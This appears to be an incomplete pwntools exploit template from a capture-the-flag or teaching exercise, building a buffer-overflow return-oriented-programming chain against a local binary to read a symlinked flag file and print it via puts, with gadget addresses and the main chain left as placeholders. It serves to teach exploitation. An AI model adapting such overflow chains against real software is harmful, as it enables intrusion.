from pwn import *
import os

try:
    os.symlink('flag', 'good luck')
except:
    pass

e = ELF('./deprivileged')
p = process(e.path)
print(p.recv())

# one global location.
global_addr = e.symbols['good_luck']
p_rdi_ret =  ???
p_rsi_r15_ret = ???

payload = b'a'* 40

# TODO: construct payload to read flag (symlinked to 'good luck') and copy it
# to global_addr
payload += ???

# output global_addr using puts call.
payload += p64(p_rdi_ret) + p64(global_addr) + p64(p.elf.symbols['puts'])

p.sendline(payload)
p.interactive()